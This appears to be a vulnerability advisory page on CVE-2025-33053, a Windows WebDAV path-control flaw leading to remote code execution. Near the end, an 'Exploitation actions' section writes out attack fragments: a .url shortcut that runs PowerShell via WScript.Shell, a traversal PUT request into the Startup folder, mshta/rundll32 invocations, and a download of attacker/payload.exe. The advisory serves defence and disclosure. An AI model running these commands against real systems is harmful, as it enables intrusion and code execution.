Windows WebDAV: External control of file name/path in WebDAV leading to RCE (CVE-2025-33053) #shorts
Summary
On June 10, 2025, Microsoft patched CVE-2025-33053, a critical zero-day remote code execution vulnerability in its WebDAV implementation. Actively exploited by the Stealth Falcon APT in targeted cyber-espionage campaigns, the flaw allowed an attacker to execute arbitrary code over the network by abusing external control of file names or paths.
Product details
CVE-2025-33053 affects a broad range of Windows releases, including: • Windows 10 Version 1809, 21H2, 22H2, 1507, 1607 • Windows 11 Versions 22H2, 22H3, 23H2, 24H2 • Windows Server 2008 SP2 (Full/Server Core), 2008 R2 SP1, 2012/2012 R2 (Full/Server Core), 2016/2019 (Full/Server Core), 2022 (Full/Server Core), 2025 (Server Core) All installations prior to the patched build numbers are affected.
Vulnerability type summary
CWE-73: External Control of File Name or Path. The WebDAV service failed to validate or sanitize attacker-supplied file paths, enabling an unauthorized user to manipulate the file namespace and trigger remote code execution.
Details of the vulnerability
Stealth Falcon exploited this zero-day by delivering a malicious .url shortcut via spear-phishing to targets in the Middle East. The .url file leveraged a living-off-the-land binary (LOLBin) to invoke the WebDAV client with a crafted path. Because the service did not properly restrict folder or file input, the attacker could traverse directories, plant a payload, and execute arbitrary commands under SYSTEM privileges. Microsoft’s investigation confirmed the flaw was under active exploitation for espionage prior to the June Patch Tuesday release.
Conclusion
Organizations and users must install the June 2025 security updates immediately to remediate CVE-2025-33053. In environments where WebDAV is not required, consider disabling the protocol or applying network-level controls. Monitor logs for unexpected WebDAV requests and review filtering rules to block malicious .url invocation patterns.
Watch the full video on YouTube: CVE-2025-33053
Remediation and exploitation details
This chain involves the following actors
- Stealth Falcon APT group: attacker
- IT administrator: defender
This following systems are involved
- Windows WebDAV service (file management over HTTP): vulnerable component
- Windows 10, Windows 11, Windows Server (operating system hosting WebDAV): affected platform
Attack entry point
- WebDAV file name and path parameter: file path supplied via HTTP PUT in WebDAV
- Malicious .url shortcut file: Internet Shortcut containing script code invoked by Windows
Remediation actions
Exploitation actions
external control of file name/path via crafted file content
- [InternetShortcut]\r\nURL=javascript:new ActiveXObject('WScript.Shell').Run('cmd.exe /c powershell -e ...')
use of ../ sequences to escape root and write to Windows Startup
- PUT /webdav/..\\..\\Windows\\Startup\\evil.url HTTP/1.1
- Host: target.example.com
living-off-the-land binary execution
- mshta.exe C:\Windows\Startup\evil.url
- rundll32.exe url.dll,FileProtocolHandler C:\Windows\Startup\evil.url
remote code execution via externally controlled file
- JavaScript downloads an executable from http://attacker/payload.exe and runs it
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053
- [2025-06-11] A critical zero-day vulnerability in Microsoft Windows, designated CVE-2025-33053, has been actively exploited by the APT group Stealth Falcon.
- [2025-06-11] Microsoft fixes zero-day vulnerability exploited for cyber espionage in June 2025 Patch Tuesday.
- [2025-06-10] Stealth Falcon APT group uses a .url file with LOLBin to execute malware in the Middle East.
- [2025-06-10] Microsoft's June 2025 Patch Tuesday release addresses 65 CVEs, including two zero-day vulnerabilities.
- [2025-06-11] Microsoft has fixed the CVE-2025-33053 vulnerability in WebDAV that allowed remote code execution.
- [2025-06-11] A new critical zero-day RCE vulnerability in Microsoft Windows, tracked as CVE-2025-33053, is being exploited by the Stealth Falcon APT group.